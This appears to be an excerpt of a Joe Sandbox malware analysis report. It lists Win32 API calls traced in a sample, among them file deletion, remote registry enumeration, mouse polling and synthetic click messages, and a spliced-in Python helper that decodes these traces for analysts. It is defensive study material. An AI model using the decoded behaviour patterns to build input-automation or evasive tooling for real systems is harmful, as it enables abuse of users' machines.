• Instruction Fuzzy Hash: 94D02B316025316746326B7C7C08DDF2B18AED5F113050538FC00A6114CF20CC13C1F8
APIs
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A035C4
• DeleteFileW.KERNEL32(?), ref: 00A03646
• CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A0365C
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A0366D
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A0367F
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: File$Delete$Copy
• String ID:
• API String ID: 3226157194-0
• Opcode ID: 076e72df9a8f3875b9537a6cd2b6e2ac510ef3d09e4262800d46be45cb2223b7
• Instruction ID: b3a0d0066ac0a478abaa955d5ba0f50ea2a17dbae81fbfb0cd7600f852f2fc4d
• Opcode Fuzzy Hash: 076e72df9a8f3875b9537a6cd2b6e2ac510ef3d09e4262800d46be45cb2223b7
• Instruction Fuzzy Hash: 88B15C72A0111DABDF11DBA4DD85FEEBBBDEF49310F0040A6F609A6191EB319B458B60
APIs
• GetCurrentProcessId.KERNEL32 ref: 00A1AE87
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A1AE95
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A1AEC8
• CloseHandle.KERNEL32(?), ref: 00A1B09D
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
• Opcode ID: db214507fd13341cd5836dfb981c925533c2c8c0d17a0de2bae7c75e40ed84e4
• Instruction ID: 9fe0ff7403596cf242a2a48751648f542e15abeb9bf03a7911fcc0320a678a8f
• Opcode Fuzzy Hash: db214507fd13341cd5836dfb981c925533c2c8c0d17a0de2bae7c75e40ed84e4
• Instruction Fuzzy Hash: 66A19171A04301AFE720DF28C886F2AB7E5AF88714F54885DF5999B2D2DB71EC41CB91
APIs
  • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
  • Part of subcall function 00A1D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A1C10E,?,?), ref: 00A1D415
  • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D451
  • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D4C8
  • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A1C505
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A1C560
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A1C5C3
• RegCloseKey.ADVAPI32(?,?), ref: 00A1C606
• RegCloseKey.ADVAPI32(00000000), ref: 00A1C613
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 826366716-0
• Opcode ID: ca42f32537811bdeab5a237d05bdb4a141ad540638fa107336d40335c7500432
• Instruction ID: 8f565397edfc071269b1c39c8f7300b100a7db7962b86c268461faf5754ae818
• Opcode Fuzzy Hash: ca42f32537811bdeab5a237d05bdb4a141ad540638fa107336d40335c7500432
• Instruction Fuzzy Hash: D061A171148241AFD714DF18C894F6ABBE5FF84328F54855CF09A8B2A2DB31ED46CB91
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009FE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009FD7CD,?), ref: 009FE714
                                                                                                                                                                                                                                    • Part of subcall function 009FE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009FD7CD,?), ref: 009FE72D
                                                                                                                                                                                                                                    • Part of subcall function 009FEAB0: GetFileAttributesW.KERNEL32(?,009FD840), ref: 009FEAB1
                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 009FED8A
                                                                                                                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 009FEDC3
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009FEF02
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009FEF1A
                                                                                                                                                                                                                                  • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 009FEF67
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
• String ID:
• API String ID: 3183298772-0
• Opcode ID: 236165637eae69758021049e933c44ccaea1c4c759e89068a902137a8dd5574c
• Instruction ID: 2cd951744f08d436fc2bcf3fe0b3946a63648814a0d056e87cd9f4704776f27c
• Opcode Fuzzy Hash: 236165637eae69758021049e933c44ccaea1c4c759e89068a902137a8dd5574c
• Instruction Fuzzy Hash: 0E5146B25083499BC724EB94DC95AEB73DCAFC4350F00092EF685D31A1EF75A6888756
APIs
• VariantInit.OLEAUT32(?), ref: 009F9534
• VariantClear.OLEAUT32 ref: 009F95A5
• VariantClear.OLEAUT32 ref: 009F9604
• VariantClear.OLEAUT32(?), ref: 009F9677
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 009F96A2
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
• Opcode ID: afc1d2a168020d6e34b064145093dd2d04dddf4e43ac90519f751459e1f7daaa
• Instruction ID: e4414d6a1af7cdce77f9eeab94a83d2b46907895467d7fb18811bd328e475505
• Opcode Fuzzy Hash: afc1d2a168020d6e34b064145093dd2d04dddf4e43ac90519f751459e1f7daaa
• Instruction Fuzzy Hash: CF5149B5A00619AFCB14DF68C884EAAB7F8FF89314B158569F915DB310E734E912CF90
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00A095F3
• GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00A0961F
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00A09677
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00A0969C
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00A096A4
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
• Opcode ID: 2d6720dc5a13695159a78ba9ebc5b6eec647865b43a94c59a38c64082100249b
• Instruction ID: 444f72a69c309f6c5318cfbe84b989298554efa2df92a3e08adb34bcd94ee288
• Opcode Fuzzy Hash: 2d6720dc5a13695159a78ba9ebc5b6eec647865b43a94c59a38c64082100249b
• Instruction Fuzzy Hash: 0C514D35A00219DFDF15DF59C895AAABBF5FF89314F048058E849AB3A2CB35ED41CB90
APIs
• LoadLibraryW.KERNEL32(?,00000000,?), ref: 00A1999D
• GetProcAddress.KERNEL32(00000000,?), ref: 00A19A2D
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00A19A49
• GetProcAddress.KERNEL32(00000000,?), ref: 00A19A8F
• FreeLibrary.KERNEL32(00000000), ref: 00A19AAF
  • Part of subcall function 009AF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00A01A02,?,753CE610), ref: 009AF9F1
  • Part of subcall function 009AF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,009F0354,00000000,00000000,?,?,00A01A02,?,753CE610,?,009F0354), ref: 009AFA18
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
• String ID:
• API String ID: 666041331-0
• Opcode ID: 882098584cffeac842718c590fa3665ebabe0fc9b1796024ae80fd43a5e26e5a
• Instruction ID: bf787da32342710d8ba4f7b5f1f4be7bcfd51aec6bdd63f5f01943940e10bdff
• Opcode Fuzzy Hash: 882098584cffeac842718c590fa3665ebabe0fc9b1796024ae80fd43a5e26e5a
• Instruction Fuzzy Hash: 86515835604205DFDB10DF68C4949EABBF0FF49354B1881A8E80AAB762D731ED86CB81
APIs
• SetWindowLongW.USER32(00000002,000000F0,?), ref: 00A2766B
• SetWindowLongW.USER32(?,000000EC,?), ref: 00A27682
• SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00A276AB
• ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00A0B5BE,00000000,00000000), ref: 00A276D0
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00A276FF
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3688381893-0
                                                                                                                                                                                                                                  • Opcode ID: 51bc0dd24835f7bbea869cb1b5592422cf2e16d11d911a2eb26cb2a25bb695fb
                                                                                                                                                                                                                                  • Instruction ID: 3c7c2a9b3b9a62607d088d8161557d7f8529738491ebd394d222ff2d44abb2d7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51bc0dd24835f7bbea869cb1b5592422cf2e16d11d911a2eb26cb2a25bb695fb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E41E035A08524AFC725CF6CEC48FAA7BA5EB49350F150234F819A72E1D770AE12CA50
APIs
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 4fda94e04ab073d1fa25909dea2ccf479b720c1d84ca132191621d24c66cb105
• Instruction ID: 3690dca9d780e41fc72dce86c27365fa55a27750c7c1a9f67197c5283502fd67
• Opcode Fuzzy Hash: 4fda94e04ab073d1fa25909dea2ccf479b720c1d84ca132191621d24c66cb105
• Instruction Fuzzy Hash: 69419F32E002009BDB24DFB8C981F5AB7B5EF89714B15456DE516EB291D631AD028B81
APIs
• GetCursorPos.USER32(?), ref: 009919E1
• ScreenToClient.USER32(00000000,?), ref: 009919FE
• GetAsyncKeyState.USER32(00000001), ref: 00991A23
• GetAsyncKeyState.USER32(00000002), ref: 00991A3D
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
• Opcode ID: c6bc01894b6b5647d4d20c03ba78929e78d90b34823fd3290d13086f2229ce6d
• Instruction ID: 1d40d0993988ce09d852f1d1a4e617e76c80ab93191eea01a4f048e67ce6ec64
• Opcode Fuzzy Hash: c6bc01894b6b5647d4d20c03ba78929e78d90b34823fd3290d13086f2229ce6d
• Instruction Fuzzy Hash: 2C413C71A0921BAFDF15DFA8C844BFEB775FB05325F20822AE429A2290C7346E55CB51
APIs
• GetInputState.USER32 ref: 00A04310
• TranslateAcceleratorW.USER32(?,00000000,?), ref: 00A04367
• TranslateMessage.USER32(?), ref: 00A04390
• DispatchMessageW.USER32(?), ref: 00A0439A
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A043AB
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Message$Translate$AcceleratorDispatchInputPeekState
• String ID:
• API String ID: 2256411358-0
• Opcode ID: 7c3b0752dd25a57b7db2a3f33f43042a9a019e6c24c92e6e80a622bcf6ec3312
• Instruction ID: e8418bd7439e0e62c16bcbdd63173197011e30c386de261205afddb7b77e79be
• Opcode Fuzzy Hash: 7c3b0752dd25a57b7db2a3f33f43042a9a019e6c24c92e6e80a622bcf6ec3312
• Instruction Fuzzy Hash: AD31B7B0504749DFEB38CBB4F848BB63BB8BB09304F041569D662CA1E0E7B59446CB22
APIs
• GetWindowRect.USER32(?,?), ref: 009F2262
• PostMessageW.USER32(00000001,00000201,00000001), ref: 009F230E
• Sleep.KERNEL32(00000000,?,?,?), ref: 009F2316
• PostMessageW.USER32(00000001,00000202,00000000), ref: 009F2327
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 009F232F
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: 3b5c26347cacb2c698836752d6b4a5c1415fc6487f8c3af9c14299f141d48808
• Instruction ID: 92efc96fd764f6cb1b2066a01d1a0b25e61c47cee81c5357e11b827a766eb098
• Opcode Fuzzy Hash: 3b5c26347cacb2c698836752d6b4a5c1415fc6487f8c3af9c14299f141d48808
• Instruction Fuzzy Hash: 3E31B17190021DEFDB14CFA8CD89BEE3BB5EB04315F104225FA25AB2D1C7749955DB90
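The API reference lines in these records follow one fixed form (API.MODULE(args), ref: address, with `?` for arguments the sandbox could not resolve), and the raw hex arguments hide what the calls do: in the record above, 00000201 and 00000202 are WM_LBUTTONDOWN and WM_LBUTTONUP, so PostMessageW / Sleep / PostMessageW at 009F230E..009F2327 is a synthetic left click delivered to a window handle, and the earlier GetAsyncKeyState(00000001) / GetAsyncKeyState(00000002) pair at 00991A23 / 00991A3D polls the physical left and right mouse buttons. The following Python is an added analyst helper, not Joe Sandbox code and not part of this report: it parses lines in that form, decodes the window-message, virtual-key and PeekMessage flag constants from the public Win32 headers (winuser.h, commctrl.h), and flags those two patterns. The sample input is copied from the records on this page; the pattern names are the analyst's labels, not Joe Sandbox signatures, and the listing alone does not establish which window the click targets.

```python
"""Decode Joe Sandbox 'APIs' reference lines and flag two Win32 call patterns.

Added example; not Joe Sandbox code. Constants come from the public Win32 headers.
"""
import re
from dataclasses import dataclass

# Constructed sample input: API lines copied from the disassembly records of
# process 0000000A (memory dump based at 00990000) on this page.
SAMPLE_LINES = """\
• GetCursorPos.USER32(?), ref: 009919E1
• ScreenToClient.USER32(00000000,?), ref: 009919FE
• GetAsyncKeyState.USER32(00000001), ref: 00991A23
• GetAsyncKeyState.USER32(00000002), ref: 00991A3D
• GetWindowRect.USER32(?,?), ref: 009F2262
• PostMessageW.USER32(00000001,00000201,00000001), ref: 009F230E
• Sleep.KERNEL32(00000000,?,?,?), ref: 009F2316
• PostMessageW.USER32(00000001,00000202,00000000), ref: 009F2327
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 009F232F
• SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00A276AB
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A043AB
"""

# winuser.h window messages and commctrl.h list-view messages (LVM_FIRST = 0x1000).
WINDOW_MESSAGES = {
    0x0201: "WM_LBUTTONDOWN",
    0x0202: "WM_LBUTTONUP",
    0x0204: "WM_RBUTTONDOWN",
    0x0205: "WM_RBUTTONUP",
    0x1002: "LVM_GETIMAGELIST",
    0x1036: "LVM_SETEXTENDEDLISTVIEWSTYLE",
    0x1053: "LVM_FINDITEMW",
    0x1074: "LVM_SETITEMTEXTW",
}
VIRTUAL_KEYS = {0x01: "VK_LBUTTON", 0x02: "VK_RBUTTON", 0x04: "VK_MBUTTON"}

# "• Api.MODULE(arg,arg,?), ref: 0012ABCD"  or  "• Api.MODULE ref: 0012ABCD"
LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list        # int for hex values, None where the sandbox printed '?'
    ref: int          # address of the call site in the dumped image
    note: str = ""    # decoded constant, when one applies


def annotate(call):
    """Decode the argument that carries a well-known constant, if any."""
    if call.api in ("SendMessageW", "PostMessageW", "SendMessageA", "PostMessageA"):
        if len(call.args) > 1 and call.args[1] is not None:
            return WINDOW_MESSAGES.get(call.args[1], f"msg 0x{call.args[1]:04X}")
    if call.api == "GetAsyncKeyState" and call.args and call.args[0] is not None:
        return VIRTUAL_KEYS.get(call.args[0], f"vk 0x{call.args[0]:02X}")
    if call.api in ("PeekMessageW", "PeekMessageA") and len(call.args) == 5:
        if call.args[4] is not None:
            return "PM_REMOVE" if call.args[4] & 1 else "PM_NOREMOVE"
    return ""


def parse_line(line):
    """Parse one reference line; returns None for lines that are not API refs."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = []
    if m.group("args"):
        for tok in m.group("args").split(","):
            tok = tok.strip()
            args.append(None if tok == "?" else int(tok, 16))
    call = ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))
    call.note = annotate(call)
    return call


def parse_lines(text):
    return [c for c in (parse_line(l) for l in text.splitlines()) if c]


def find_synthetic_clicks(calls):
    """(down_ref, up_ref) for each PostMessage WM_LBUTTONDOWN followed within two
    calls by PostMessage WM_LBUTTONUP: a click injected into a window's queue."""
    hits = []
    for i, c in enumerate(calls):
        if c.api.startswith("PostMessage") and c.note == "WM_LBUTTONDOWN":
            for later in calls[i + 1:i + 3]:
                if later.api.startswith("PostMessage") and later.note == "WM_LBUTTONUP":
                    hits.append((c.ref, later.ref))
                    break
    return hits


def polls_mouse_buttons(calls):
    """True when the trace reads both physical mouse buttons via GetAsyncKeyState."""
    keys = {c.note for c in calls if c.api == "GetAsyncKeyState"}
    return {"VK_LBUTTON", "VK_RBUTTON"} <= keys


if __name__ == "__main__":
    parsed = parse_lines(SAMPLE_LINES)
    for call in parsed:
        print(f"{call.ref:08X} {call.api}.{call.module} {call.note}")
    print("synthetic clicks:", [f"{d:08X}->{u:08X}" for d, u in find_synthetic_clicks(parsed)])
    print("polls mouse buttons:", polls_mouse_buttons(parsed))
```

Feed it the `APIs` lines of any record from this report (the `•` bullet and the `ref:` suffix are handled) and extend `WINDOW_MESSAGES` with the constants relevant to the control class under study; a hit from `find_synthetic_clicks` says only that the code posts a button-down/button-up pair to some window, so the target handle has to be resolved from the surrounding disassembly before drawing a conclusion about what is being clicked.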
APIs
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A261E4
• SendMessageW.USER32(?,00001074,?,00000001), ref: 00A2623C
• _wcslen.LIBCMT ref: 00A2624E
• _wcslen.LIBCMT ref: 00A26259
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00A262B5
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 763830540-0
                                                                                                                                                                                                                                  • Opcode ID: d18a87b08027a3dbfbc7835eeb9c9d9f4ab2eb2abd0ed08f8bdaf9069dcea29f
                                                                                                                                                                                                                                  • Instruction ID: 2e3620ee3ebd32c35be7c45a0ae66b456530ba440b659ea098cc39d8ec0d4fe5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d18a87b08027a3dbfbc7835eeb9c9d9f4ab2eb2abd0ed08f8bdaf9069dcea29f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C21A571D01268AADB20DFA8DD84AEE7BB8FF44720F104226F925EB181D7709985CF50
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsWindow.USER32(00000000), ref: 00A113AE
                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00A113C5
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00A11401
                                                                                                                                                                                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00A1140D
                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00A11445
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4156661090-0
                                                                                                                                                                                                                                  • Opcode ID: 9ff694b53b3eba26b8164ef42f640ca4f2a3de6eb7cc34de58ac196d066e03e2
                                                                                                                                                                                                                                  • Instruction ID: f0ca515f53713c950f941b644a39d31720a86da94014226d5d9fd9b9071dac12
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ff694b53b3eba26b8164ef42f640ca4f2a3de6eb7cc34de58ac196d066e03e2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18219635600204AFD714DF69DC84AAEB7F5EF44340B048439F85AD7751CA30EC45DB90
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 009CD146
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009CD169
                                                                                                                                                                                                                                    • Part of subcall function 009C3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,009B6A79,?,0000015D,?,?,?,?,009B85B0,000000FF,00000000,?,?), ref: 009C3BC5
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 009CD18F
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CD1A2
                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009CD1B1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
